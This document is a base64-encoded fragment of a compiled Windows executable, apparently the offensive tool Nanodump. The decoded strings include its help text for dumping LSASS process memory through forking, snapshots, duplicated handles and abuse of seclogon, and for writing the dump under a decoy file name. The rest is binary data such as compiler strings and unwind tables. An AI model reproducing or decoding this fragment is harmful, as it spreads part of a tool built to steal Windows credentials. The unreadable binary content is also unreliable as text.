AICAgIC0tZm9yaywgLWYAICAgICAgICAgICAgZm9yayB0aGUgdGFyZ2V0IHByb2Nlc3MgYmVmb3JlIGR1bXBpbmcAICAgIC0tc25hcHNob3QsIC1zAAAAICAgICAgICAgICAgc25hcHNob3QgdGhlIHRhcmdldCBwcm9jZXNzIGJlZm9yZSBkdW1waW5nACAgICAtLWR1cCwgLWQAAAAAICAgICAgICAgICAgZHVwbGljYXRlIGFuIGV4aXN0aW5nIExTQVNTIGhhbmRsZQAgICAgLS1tYWxzZWNsb2dvbiwgLW0AAAAAICAgICAgICAgICAgb2J0YWluIGEgaGFuZGxlIHRvIExTQVNTIGJ5IChhYil1c2luZyBzZWNsb2dvbgAAICAgIC0tYmluYXJ5IEJJTl9QQVRILCAtYiBCSU5fUEFUSAAAICAgICAgICAgICAgZnVsbCBwYXRoIHRvIHRoZSBkZWNveSBiaW5hcnkgdXNlZCB3aXRoIC0tZHVwIGFuZCAtLW1hbHNlY2xvZ29uACAgICAtLWhlbHAsIC1oAAAgICAgICAgICAgICBwcmludCB0aGlzIGhlbHAgbWVzc2FnZSBhbmQgbGVhdmUAAABOYW5vZHVtcCBkb2VzIG5vdCBzdXBwb3J0IFdvVzY0AC0tZ2V0cGlkAC12AC0tdmFsaWQALXcALS13cml0ZQBtaXNzaW5nIC0td3JpdGUgdmFsdWUALXAALS1waWQAbWlzc2luZyAtLXBpZCB2YWx1ZQAwMTIzNDU2Nzg5AEludmFsaWQgUElEOiAlcwAtZgAtLWZvcmsALXMALS1zbmFwc2hvdAAtZAAtLWR1cAAtbQAtLW1hbHNlY2xvZ29uAC1zMgAtLXN0YWdlMgAtYgAtLWJpbmFyeQBtaXNzaW5nIC0tYmluYXJ5IHZhbHVlAABZb3UgbXVzdCBwcm92aWRlIGEgZnVsbCBwYXRoOiAlcwAAAABUaGUgYmluYXJ5ICIlcyIgZG9lcyBub3QgZXhpc3RzLgAtaAAtLWhlbHAAaW52YWxpZCBhcmd1bWVudDogJXMASWYgTWFsU2VjTG9nb24gaXMgYmVpbmcgdXNlZCBsb2NhbGx5LCB5b3UgbmVlZCB0byBwcm92aWRlIHRoZSBmdWxsIHBhdGg6ICVzAFRoZSBvcHRpb25zIC0tZm9yayBhbmQgLS1zbmFwc2hvdCBjYW5ub3QgYmUgdXNlZCBhdCB0aGUgc2FtZSB0aW1lAExTQVNTIFBJRDogJWxkAAAAAFlvdSBtdXN0IHByb3ZpZGUgdGhlIGR1bXAgZmlsZTogLS13cml0ZSBDOlxXaW5kb3dzXFRlbXBcZG9jLmRvY3gAAAAASWYgLS1kdXAgYW5kIC0tbWFsc2VjbG9nb24gYXJlIHVzZWQsIHlvdSBuZWVkIHRvIHByb3ZpZGUgYSBiaW5hcnkgd2l0aCAtLWJpbmFyeQBUaGUgb3B0aW9uIC0tYmluYXJ5IGNhbiBvbmx5IGJlIHVzZWQgd2l0aCAtLW1hbHNlY2xvZ29uIGFuZCAtLWR1cAAAAEB/QAAAoEEABKBBAABoQQAckEEAAAAAAAAAAABVbmtub3duIGVycm9yAAAAX21hdGhlcnIoKTogJXMgaW4gJXMoJWcsICVnKSAgKHJldHZhbD0lZykKAABBcmd1bWVudCBkb21haW4gZXJyb3IgKERPTUFJTikAQXJndW1lbnQgc2luZ3VsYXJpdHkgKFNJR04pAABPdmVyZmxvdyByYW5nZSBlcnJvciAoT1ZFUkZMT1cpAFRoZSByZXN1bHQgaXMgdG9vIHNtYWxsIHRvIGJlIHJlcHJlc2VudGVkIChVTkRFUkZMT1cpAAAAVG90YWwgbG9zcyBvZiBzaWduaWZpY2FuY2UgKFRMT1NTKQAAUGFydGlhbCBsb3NzIG9mIHNpZ25pZmljYW5jZSAoUExPU1MpAAAAACgNQQBHDUEAZA1BAIQNQQC8DUEA4A1BAE1pbmd3LXc2NCBydW50aW1lIGZhaWx1cmU6CgBBZGRyZXNzICVwIGhhcyBubyBpbWFnZS1zZWN0aW9uACAgVmlydHVhbFF1ZXJ5IGZhaWxlZCBmb3IgJWQgYnl0ZXMgYXQgYWRkcmVzcyAlcAAAAAAgIFZpcnR1YWxQcm90ZWN0IGZhaWxlZCB3aXRoIGNvZGUgMHgleAAAICBVbmtub3duIHBzZXVkbyByZWxvY2F0aW9uIHByb3RvY29sIHZlcnNpb24gJWQuCgAAACAgVW5rbm93biBwc2V1ZG8gcmVsb2NhdGlvbiBiaXQgc2l6ZSAlZC4KAAAAJWQgYml0IHBzZXVkbyByZWxvY2F0aW9uIGF0ICVwIG9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